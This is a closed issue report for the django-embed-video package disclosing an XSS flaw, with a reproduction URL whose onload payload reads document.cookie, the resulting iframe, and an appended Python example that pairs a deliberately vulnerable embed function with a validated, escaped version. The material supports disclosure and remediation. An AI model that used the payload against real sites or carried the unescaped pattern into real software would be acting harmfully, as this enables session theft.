Closed Remiz closed 1 year ago
Hi,
I think I've noticed a possible XSS using this package when users are allowed to provide URLs. Here is the code I've used to reproduce the issue:
```python
import embed_video

url = 'https://www.youtube.com/watch?v=\asa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https%3A%2F%2Fwww.aa%22aaaa.com onload=%22javascript:alert(document.cookie)%22'
video = embed_video.backends.detect_backend(url)
video.is_secure = True
print(video.get_embed_code(800, 400))
```
And here is the result of the embedded code:
```html
<iframe width="800" height="400" src="https://www.youtube.com/embed/sa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https://www.aa"aaaa.com onload="javascript:alert(document.cookie)"?wmode=opaque" loading="lazy" frameborder="0" allowfullscreen></iframe>
```
It looks like the URL-encoded double quotes are decoded by urlparse.parse_qs somehow.
Hi and thanks for catching this.
The URL needs to be validated and sanitized. Would anyone happen to have ideas and time for improving the security?
Fixed by #187
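As an added example (not code from django-embed-video, from the reporter, or from the fix referenced above), the following self-contained Python reproduces the mechanism the report describes with a stand-in for the library's embed-code generation, and shows the validation and escaping the maintainer asks for. The attack URL, the `vulnerable_embed` and `safe_embed` functions, the accepted host list and the 11-character `[A-Za-z0-9_-]` video-id pattern are all constructed for this illustration.

```python
import html
import re
from urllib.parse import parse_qs, urlparse

# Constructed attack URL with the same shape as the one in the report: the %22
# sequences are percent-encoded double quotes inside the `v` query parameter.
ATTACK_URL = (
    "https://www.youtube.com/watch?v=C0DPdy98e4c"
    "%22%20onload=%22javascript:alert(document.cookie)%22"
)
BENIGN_URL = "https://www.youtube.com/watch?v=C0DPdy98e4c"

# Assumed allowlist for this example; the real library supports more backends.
ALLOWED_HOSTS = {"youtube.com", "www.youtube.com", "m.youtube.com"}
# Assumed id shape: 11 URL-safe base64 characters, which can never contain a quote.
VIDEO_ID_RE = re.compile(r"[A-Za-z0-9_-]{11}")


class InvalidVideoURL(ValueError):
    """Raised when a user-supplied URL does not look like a video link."""


def query_params(url):
    """parse_qs percent-decodes every value, so %22 comes back as a literal '"'.

    This is the behaviour the report points at: the encoding that made the
    quotes harmless in the URL is undone before the value reaches the HTML.
    """
    return parse_qs(urlparse(url).query)


def vulnerable_embed(url, width=800, height=400):
    """Mimics the reported pattern: copy the decoded `v` value into src unescaped."""
    code = query_params(url)["v"][0]
    src = f"https://www.youtube.com/embed/{code}?wmode=opaque"
    return (
        f'<iframe width="{width}" height="{height}" src="{src}" '
        'loading="lazy" frameborder="0" allowfullscreen></iframe>'
    )


def extract_code(url):
    """Accept the URL only if scheme, host and video id all match the allowlist."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or parsed.hostname not in ALLOWED_HOSTS:
        raise InvalidVideoURL("not a YouTube watch URL")
    values = parse_qs(parsed.query).get("v", [])
    # Exactly one `v`, and its full decoded value must be a well-formed id.
    if len(values) != 1 or not VIDEO_ID_RE.fullmatch(values[0]):
        raise InvalidVideoURL("missing or malformed video id")
    return values[0]


def safe_embed(url, width=800, height=400):
    """Validate the id, then escape the attribute value anyway (defence in depth)."""
    code = extract_code(url)
    src = f"https://www.youtube.com/embed/{code}?wmode=opaque"
    return (
        f'<iframe width="{int(width)}" height="{int(height)}" '
        f'src="{html.escape(src, quote=True)}" '
        'loading="lazy" frameborder="0" allowfullscreen></iframe>'
    )


def is_accepted(url):
    """True if safe_embed would render the URL, False if it rejects it."""
    try:
        extract_code(url)
    except InvalidVideoURL:
        return False
    return True


if __name__ == "__main__":
    print(query_params(ATTACK_URL)["v"][0])   # quotes already decoded
    print(vulnerable_embed(ATTACK_URL))       # onload= breaks out of src
    print(is_accepted(ATTACK_URL), is_accepted(BENIGN_URL))
    print(safe_embed(BENIGN_URL))
```

The allowlist check on the decoded id is what actually closes the hole: once the id can only be eleven URL-safe characters, no quote, space or `=` can reach the attribute. `html.escape` on the finished `src` costs nothing and covers any future code path that builds the attribute from less strictly validated input.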